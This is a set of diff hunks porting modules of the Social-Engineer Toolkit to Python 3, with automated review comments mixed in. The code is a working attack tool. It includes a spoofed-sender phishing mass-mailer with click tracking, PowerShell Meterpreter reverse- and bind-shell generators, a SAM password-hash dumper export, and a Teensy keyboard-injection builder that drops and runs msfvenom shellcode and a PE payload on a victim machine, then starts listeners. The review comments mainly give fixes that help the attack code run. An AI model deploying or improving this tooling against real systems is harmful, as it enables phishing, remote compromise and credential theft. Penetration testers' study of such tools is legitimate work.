"Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
@ -52,24 +53,27 @@ for line in sendmail_file:
if sendmail_choice == "YES":
print_info("Sendmail can take up to 3-5 minutes to start")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
subprocess.Popen(
"/etc/init.d/sendmail start", shell=True).wait()
if not os.path.isfile("/etc/init.d/sendmail"):
pause = raw_input("[!] Sendmail was not found. Try again and restart. (For Kali - apt-get install sendmail-bin)")
pause = input(
"[!] Sendmail was not found. Try again and restart. (For Kali - apt-get install sendmail-bin)")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw provideruser and password to blank, needed for defining below
provideruser=''
pwd=''
sendmail = 1
# just throw provideruser and password to blank, needed for
# defining below
provideruser = ''
pwd = ''
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
match1 = re.search("EMAIL_PROVIDER=", line)
if match1:
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
email_provider = line.replace("EMAIL_PROVIDER=", "").lower()
# support smtp for gmail
if email_provider == "gmail":
@ -106,14 +110,14 @@ print ("""
99. Return to main menu.
""")
option1=raw_input(setprompt(["5"], ""))
option1 = input(setprompt(["5"], ""))
if option1 == 'exit':
exit_set()
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
@ -132,47 +136,58 @@ if option1 == '2':
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
filepath = input(
setprompt(["1"], "Path to the file to import into SET"))
if not os.path.isfile(filepath):
while 1:
print "[!] File not found! Please try again and enter the FULL path to the file."
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
print("[!] File not found! Please try again and enter the FULL path to the file.")
filepath = input(
setprompt(["1"], "Path to the file to import into SET"))
if os.path.isfile(filepath):
break
# exit mass mailer menu
if option1 == '99':
print "Returning to main menu..."
print("Returning to main menu...")
if option1 != "99":
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
print(("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (
email_provider)))
relay = input(setprompt(["1"], ""))
counter=0
counter = 0
# Specify mail Option Here
if relay == '1':
provideruser = raw_input(setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = provideruser
from_displayname = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
provideruser = input(
setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = provideruser
from_displayname = input(
setprompt(["1"], "The FROM NAME the user will see"))
pwd = getpass.getpass("Email password: ")
# Specify Open-Relay Option Here
# Specify Open-Relay Option Here
if relay == '2':
from_address = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
from_address = input(
setprompt(["1"], "From address (ex: moo@example.com)"))
from_displayname = input(
setprompt(["1"], "The FROM NAME the user will see"))
if sendmail == 0:
# Ask for a username and password if we aren't using sendmail
provideruser = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
provideruser = input(
setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if sendmail == 0:
smtp = input(setprompt(
["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = input(
setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
# specify if its a high priority or not
highpri=yesno_prompt(["1"], "Flag this message/s as high priority? [yes|no]")
highpri = yesno_prompt(
["1"], "Flag this message/s as high priority? [yes|no]")
if not "YES" in highpri:
prioflag1 = ""
prioflag2 = ""
@ -180,47 +195,52 @@ if option1 != "99":
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
subject=raw_input(setprompt(["1"], "Email subject"))
subject = input(setprompt(["1"], "Email subject"))
try:
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
html_flag = input(
setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
# if we are specifying plain or defaulting to plain
if html_flag == "" or html_flag == "p":
message_flag="plain"
message_flag = "plain"
# if we are specifying html
if html_flag == "h":
message_flag="html"
message_flag = "html"
# start the body off blank
body = ""
## Here we start to check if we want to track users when they click
## essentially if this flag is turned on, a quick search and replace
## occurs via base64 encoding on the user name. that is then added
## during the def mail function call and the username is posted as
## part of the URL. When we check the users, they can be coorelated
## back to the individual user when they click the link.
# Here we start to check if we want to track users when they click
# essentially if this flag is turned on, a quick search and replace
# occurs via base64 encoding on the user name. that is then added
# during the def mail function call and the username is posted as
# part of the URL. When we check the users, they can be coorelated
# back to the individual user when they click the link.
# track email is pulled dynamically from the config as TRACK_EMAIL_ADDRESSES
# track email is pulled dynamically from the config as
# TRACK_EMAIL_ADDRESSES
if track_email.lower() == "on":
print "You have specified to track user email accounts when they are sent. In"
print "order for this to work, you will need to specify the URL within the body"
print "of the email and where you would like to inject the base64 encoded name."
print "\nWhen a user clicks on the link, the URL Will post back to SET and track"
print "each of the users clicks and who the user was. As an example, say my SET"
print "website is hosted at http://www.trustedsec.com/index.php and I want to track users."
print "I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in"
print "order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the"
print "keyword that SET uses in order to replace the base name with the URL."
print "\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!"
print "\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work."
print_warning("IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.")
body=raw_input(setprompt(["1"], "Enter the body of the message, type END (capitals) when finished"))
print("You have specified to track user email accounts when they are sent. In")
print("order for this to work, you will need to specify the URL within the body")
print("of the email and where you would like to inject the base64 encoded name.")
print("\nWhen a user clicks on the link, the URL Will post back to SET and track")
print("each of the users clicks and who the user was. As an example, say my SET")
print("website is hosted at http://www.trustedsec.com/index.php and I want to track users.")
print("I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in")
print("order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the")
print("keyword that SET uses in order to replace the base name with the URL.")
print("\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!")
print("\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work.")
print_warning(
"IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.")
body = input(setprompt(
["1"], "Enter the body of the message, type END (capitals) when finished"))
# loop through until they are finished with the body of the subject line
# loop through until they are finished with the body of the subject
# line
while body != 'exit':
try:
body+=("\n")
body_1 = raw_input("Next line of the body: ")
body += ("\n")
body_1 = input("Next line of the body: ")
if body_1 == "END":
break
else:
@ -230,30 +250,35 @@ if option1 != "99":
except KeyboardInterrupt:
break
# if we are tracking emails, this is some cleanup and detection to see if they entered .html instead or didn't specify insertuserhere
# if we are tracking emails, this is some cleanup and detection to see
# if they entered .html instead or didn't specify insertuserhere
if track_email.lower() == "on":
# here we replace url with .php if they made a mistake
body = body.replace(".html", ".php")
if not "?INSERTUSERHERE" in body:
print_error("You have track email to on however did not specify ?INSERTUSERHERE.")
print_error("Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = raw_input("Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
print_error(
"You have track email to on however did not specify ?INSERTUSERHERE.")
print_error(
"Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = input(
"Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
# except KeyboardInterrupts (control-c) and pass through.
except KeyboardInterrupt:
pass
def mail(to, subject, prioflag1, prioflag2, text):
msg = MIMEMultipart()
msg['From'] = str(Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['From'] = str(
Header(from_displayname, 'UTF-8').encode() + ' <' + from_address + '> ')
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = Header(subject, 'UTF-8').encode()
body_type=MIMEText(text, "%s" % (message_flag), 'UTF-8')
body_type = MIMEText(text, "%s" % (message_flag), 'UTF-8')
msg.attach(body_type)
mailServer = smtplib.SMTP(smtp, port)
@ -271,7 +296,8 @@ def mail(to, subject, prioflag1, prioflag2, text):
pass
mailServer.ehlo()
else: mailServer.ehlo()
else:
mailServer.ehlo()
try:
if provideruser != "" or pwd != "":
@ -286,8 +312,9 @@ def mail(to, subject, prioflag1, prioflag2, text):
mailServer.docmd(base64.b64encode(pwd), "")
# except exceptions and print incorrect passowrd
except Exception, e:
print_warning("It appears your password was incorrect.\nPrinting response: "+(str(e)))
except Exception as e:
print_warning(
"It appears your password was incorrect.\nPrinting response: " + (str(e)))
return_continue()
if sendmail == 1:
@ -297,14 +324,16 @@ def mail(to, subject, prioflag1, prioflag2, text):
if option1 == '1':
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
# if we specify to track users, this will replace the INSERTUSERHERE with
# the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# call the function to send email
try:
mail(to,subject,prioflag1,prioflag2,body_new)
mail(to, subject, prioflag1, prioflag2, body_new)
except socket.error:
print_error("Unable to establish a connection with the SMTP server. Try again.")
print_error(
"Unable to establish a connection with the SMTP server. Try again.")
sys.exit()
except KeyboardInterrupt:
print_error("Control-C detected, exiting out of SET.")
@ -315,22 +344,24 @@ if option1 == '1':
# if we specified the mass mailer for multiple users
if option1 == '2':
email_num=0
fileopen=file(filepath, "r").readlines()
email_num = 0
fileopen = open(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
# if we specify to track users, this will replace the INSERTUSERHERE
# with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# send the actual email
time_delay = check_config("TIME_DELAY_EMAIL=").lower()
time.sleep(int(time_delay))
mail(to,subject,prioflag1,prioflag2,body_new)
email_num=email_num+1
mail(to, subject, prioflag1, prioflag2, body_new)
email_num = email_num + 1
# simply print the statement
print_status("Sent e-mail number: " + (str(email_num)) + " to address: " + to)
print_status("Sent e-mail number: " +
(str(email_num)) + " to address: " + to)
if option1 != "99":
# finish up here


@ -10,9 +10,9 @@ from src.core.menu import text
me = mod_name()
debug_msg(me, "printing 'text.powershell menu'",5)
debug_msg(me, "printing 'text.powershell menu'", 5)
show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = raw_input(setprompt(["29"], ""))
powershell_menu_choice = input(setprompt(["29"], ""))
if powershell_menu_choice != "99":
# specify ipaddress of reverse listener
@ -21,70 +21,86 @@ if powershell_menu_choice != "99":
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
port = input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = file(setdir + "/payload_options.shellcode", "w")
filewrite = open(setdir + "/payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_tcp " + port + ",")
filewrite.close()
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
# here we format everything for us
x86 = file(setdir + "/x86.powershell", "r")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
choice = yesno_prompt(
"0", "Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
(msf_path, setdir), shell=True).wait()
print_status("Powershell files can be found under %s/reports/powershell/" % (setdir))
print_status(
"Powershell files can be found under %s/reports/powershell/" % (setdir))
return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
port = input(
setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if port == "": port = "443"
if port == "":
port = "443"
# open the reverse shell up
print_status("Rewriting the powershell reverse shell with options")
fileopen = file("src/powershell/reverse.powershell", "r")
fileopen = open("src/powershell/reverse.powershell", "r")
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
print_status("Exporting the powershell stuff to %s/reports/powershell" % (setdir))
print_status(
"Exporting the powershell stuff to %s/reports/powershell" % (setdir))
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
filewrite = file(setdir + "/reports/powershell/powershell.reverse.txt", "w")
filewrite = open(
setdir + "/reports/powershell/powershell.reverse.txt", "w")
filewrite.write(data)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]")
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]")
if choice == "NO":
print_status("Have netcat or standard socket listener on port %s" % (port))
print_status(
"Have netcat or standard socket listener on port %s" % (port))
if choice == "YES":
socket_listener(port)
@ -93,22 +109,24 @@ if powershell_menu_choice != "99":
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
port = input(
setprompt(["29"], "Enter the port for listener [443]"))
# open file
fileopen = file("src/powershell/bind.powershell", "r")
fileopen = open("src/powershell/bind.powershell", "r")
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
filewrite = file(setdir + "/reports/powershell/powershell.bind.txt", "w")
filewrite = open(
setdir + "/reports/powershell/powershell.bind.txt", "w")
filewrite.write(data)
filewrite.close()
print_status("The powershell program has been exported to %s/reports/powershell/" % (setdir))
print_status(
"The powershell program has been exported to %s/reports/powershell/" % (setdir))
return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
@ -117,7 +135,10 @@ if powershell_menu_choice != "99":
os.makedirs(setdir + "/reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", setdir + "/reports/powershell/powerdump.encoded.txt")
print_status("The powershell program has been exported to %s/reports/powershell/" % (setdir))
print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
shutil.copyfile("src/powershell/powerdump.encoded",
setdir + "/reports/powershell/powerdump.encoded.txt")
print_status(
"The powershell program has been exported to %s/reports/powershell/" % (setdir))
print_status(
"Note with PowerDump -- You MUST be running as SYSTEM when executing.")
return_continue()
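Review bot: The `try: reload(src.payloads.powershell.prep)` / `except: import src.payloads.powershell.prep` block in the `"1"` branch no longer re-runs the prep module: `reload` is not a builtin under Python 3, the NameError is swallowed by the bare `except:`, and the fallback `import` is a no-op once the module is already loaded, so the payload prep step executes only on the first pass through this menu. Use `importlib.reload(src.payloads.powershell.prep)` (with `import importlib` at the top of the file) and narrow the handler to `except (NameError, AttributeError):` so that only the not-yet-imported case falls through to the `import`. Separately, `x86 = open(setdir + "/x86.powershell", "r")` followed by `x86 = x86.read()`, and the `fileopen = open("src/powershell/reverse.powershell", "r")` / `bind.powershell` reads, never close their handles; a `with open(...) as f: data = f.read()` form fixes that without changing behaviour.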



@ -3,6 +3,8 @@ from src.core.setcore import *
import os
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
@ -10,8 +12,10 @@ def gen_qrcode(url):
qr.make()
im = qr.makeImage()
time.sleep(1)
if os.path.isfile(setdir + "/reports/qrcode_attack.png"): os.remove(setdir + "/reports/qrcode_attack.png")
if os.path.isfile(setdir + "/reports/qrcode_attack.png"):
os.remove(setdir + "/reports/qrcode_attack.png")
# save the image out
im.save(setdir + "/reports/qrcode_attack.png", format='png')
# print that its been successful
print_status("QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))
print_status(
"QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))
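Review bot: `gen_qrcode` has no docstring; the `# generate the qrcode and save it definition` comment above `def gen_qrcode(url):` would serve better as `"""Render *url* as a QR code and save it to <setdir>/reports/qrcode_attack.png, replacing any existing file."""`. The `time.sleep(1)` between `qr.makeImage()` and the `os.path.isfile` check has no comment saying why the delay is needed; if it is not, it should go, and if it is, a one-line why-comment belongs there. The `isfile`/`remove` pair can be written as `with contextlib.suppress(FileNotFoundError): os.remove(path)` to avoid the check-then-act gap, with `import contextlib` added at the top of the file.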


@ -1,20 +1,27 @@
#!/usr/bin/python
import binascii,base64,sys,os,random,string,subprocess,socket
import binascii
import base64
import sys
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
################################################################################################
##########################################################################
#
# BSIDES LV EXE to Teensy Creator
#
# by Josh Kelley (@winfang98)
# Dave Kennedy (@hackingdave)
#
################################################################################################
##########################################################################
################################################################################################
################################################################################################
##########################################################################
##########################################################################
#
# grab the interface ip address
@ -51,7 +58,7 @@ shell_exec = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000
#########################################
# print main stuff for the application
print """
print("""
********************************************************************
BSIDES Las Vegas ---- EXE to Teensy Creator
********************************************************************
@ -63,10 +70,12 @@ place it onto a victim machine through hex to binary conversion via powershell.
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
"""
""")
# if we dont detect metasploit
if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit not detected, check set_config.\n")
if not os.path.isfile(msf_path):
sys.exit(
"\n[!] Your no gangster... Metasploit not detected, check set_config.\n")
# if we hit here we are good since msfvenom is installed
###################################################
@ -74,30 +83,33 @@ if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit
###################################################
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload=(raw_input(setprompt(["14"], "")))
payload = (input(setprompt(["14"], "")))
if payload == "exit" :
if payload == "exit":
exit_set()
# if its default then select meterpreter
if payload == "" : payload="2"
if payload == "":
payload = "2"
# assign the right payload
payload=ms_payload(payload)
payload = ms_payload(payload)
# if we're downloading and executing a file
url = ""
if payload == "windows/download_exec":
url = raw_input(setprompt(["6"], "The URL with the payload to download and execute"))
url = input(
setprompt(["6"], "The URL with the payload to download and execute"))
url = "set URL " + url
# try except for Keyboard Interrupts
try:
# grab port number
while 1:
port = raw_input(setprompt(["6"], "Port to listen on [443]"))
port = input(setprompt(["6"], "Port to listen on [443]"))
# assign port if enter is specified
if port == "": port = 443
if port == "":
port = 443
try:
# try to grab integer port
port = int(port)
@ -110,35 +122,37 @@ try:
# if we bomb out then loop through again
except:
print " [!] Not a valid port number, try again."
print(" [!] Not a valid port number, try again.")
# pass through
pass
# except keyboardintterupts here
except KeyboardInterrupt:
print """
print("""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
disabled.\n"""
disabled.\n""")
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
print " [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim..."
print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...")
# grab msfvenom alphanumeric shellcode to be inserted into shellexec
proc = subprocess.Popen("%smsfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s %s --format raw -e x86/alpha_mixed BufferRegister=EAX" % (meta_path(),payload,ipaddr,port,url), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
proc = subprocess.Popen("%smsfvenom -p %s EXITFUNC=thread LHOST=%s LPORT=%s %s --format raw -e x86/alpha_mixed BufferRegister=EAX" %
(meta_path(), payload, ipaddr, port, url), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read in stdout which will be our alphanumeric shellcode
alpha_payload = proc.stdout.read()
# generate a random filename this is going to be needed to read 150 bytes in at a time
random_filename = generate_random_string(10,15)
# generate a random filename this is going to be needed to read 150 bytes
# in at a time
random_filename = generate_random_string(10, 15)
# prep a file to write
filewrite = file(random_filename, "wb")
filewrite = open(random_filename, "wb")
# write the hex to random file
filewrite.write(shell_exec)
# close it
filewrite.close()
# open up the random file
fileopen=file(random_filename, "r")
fileopen = open(random_filename, "r")
# base counter will be used for the prog_char RevShell_counter
counter = 0
# space to write out per line in the teensy pde file
@ -148,15 +162,17 @@ rev_counter = 0
# here we begin the code
output_variable = "/* Teensy Hex to File Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)*/\n#include <avr/pgmspace.h>\n"
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename,random_filename))
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
########################################################################################################################################################################################################
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
##########################################################################
# blank command will store our fixed unicode variable
blank_command = ""
@ -175,31 +191,33 @@ while 1:
# read 150 bytes in at a time
reading_hex = fileopen.read(space).rstrip()
# if its blank then break out of loop
if reading_hex == "": break
if reading_hex == "":
break
# write out counter and hex
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_hex)
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (
counter, reading_hex)
# increase counter
counter = counter +1
counter = counter + 1
# write out the rest
output_variable += "PROGMEM const char *exploit[] = {\n"
# while rev_counter doesn't equal regular counter
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
output_variable += "RevShell_%s" % rev_counter
# incremenet counter
rev_counter = rev_counter + 1
if rev_counter == counter:
# if its equal that means we
# are done and need to append a };
output_variable+="};\n"
output_variable += "};\n"
if rev_counter != counter:
# if we don't equal, keep going
output_variable+=",\n"
output_variable += ",\n"
# vbs filename
vbs = generate_random_string(10,15) + ".vbs"
vbs = generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10,15) + ".bat"
bat = generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -303,24 +321,26 @@ Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs))
}""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, alpha_payload, bat, vbs))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
print " [*] Binary to Teensy file exported as %s/reports/binary2teensy.pde" % (setdir)
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
print(" [*] Binary to Teensy file exported as %s/reports/binary2teensy.pde" % (setdir))
# write the teensy.pde file out
filewrite = file(setdir + "/reports/binary2teensy.pde", "w")
filewrite = open(setdir + "/reports/binary2teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
print " [*] Generating a listener..."
print(" [*] Generating a listener...")
# create our metasploit answer file
filewrite = file(setdir + "/answer.txt", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url))
filewrite = open(setdir + "/answer.txt", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" %
(payload, ipaddr, port, url))
filewrite.close()
# spawn a multi/handler listener
subprocess.Popen("msfconsole -r %s/answer.txt" % (setdir), shell=True).wait()
print " [*] Housekeeping old files..."
print(" [*] Housekeeping old files...")
# if our answer file is still there (which it should be), then remove it
if os.path.isfile(setdir + "/answer.txt"):
# remove the old file, no longer used once we've exited
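Review bot: `filewrite = open(random_filename, "wb")` followed by `filewrite.write(shell_exec)` writes a `str` (the hex literal shown in the `shell_exec = "4d5a9000..."` hunk context) to a binary-mode file, which raises TypeError under Python 3; open it with `"w"`, which also matches the `fileopen = open(random_filename, "r")` text-mode read-back just below. `alpha_payload = proc.stdout.read()` now returns bytes because `stdout=subprocess.PIPE` has no `text=True`, so the later `%` interpolation into the sketch template embeds a `b'...'` repr instead of the text; decode it first, `alpha_payload = proc.stdout.read().decode()`. The `subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()` cleanup is `os.remove(random_filename)` in the standard library, and the final `subprocess.Popen("msfconsole -r %s/answer.txt" ...)` omits the `meta_path()` prefix that the earlier `msfvenom` call uses, so the two resolve the binary inconsistently. The `url` value read from `input()` is interpolated unquoted into the msfvenom shell string; `shlex.quote(url)` (or an argument list with `shell=False`) keeps a URL containing shell metacharacters from breaking the command.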


@ -67,13 +67,13 @@ void setup()
delay(1000);
Keyboard.println("import binascii");
delay(1000);
Keyboard.println("fileopen = file(\"/tmp/converts.txt\", \"rb\")");
Keyboard.println("fileopen = open(\"/tmp/converts.txt\", \"rb\")");
delay(1000);
Keyboard.println("data = fileopen.read()");
delay(1000);
Keyboard.println("data = binascii.unhexlify(data)");
delay(1000);
Keyboard.println("filewrite = file(\"/tmp/theconverted.txt\", \"w\")");
Keyboard.println("filewrite = open(\"/tmp/theconverted.txt\", \"w\")");
delay(1000);
Keyboard.println("filewrite.write(data)");
delay(1000);


@ -3,59 +3,61 @@ import pexpect
from src.core.setcore import *
import time
print """
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html)
"""
""")
# define standard metasploit payload
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = file(setdir + "/metasploit.payload", "w")
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
ipaddr = raw_input("Enter the IP for the reverse: ")
port = raw_input("Enter the port for the reverse: ")
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload,ipaddr,port, "")
filewrite = file(setdir + "/x86.powershell", "w")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
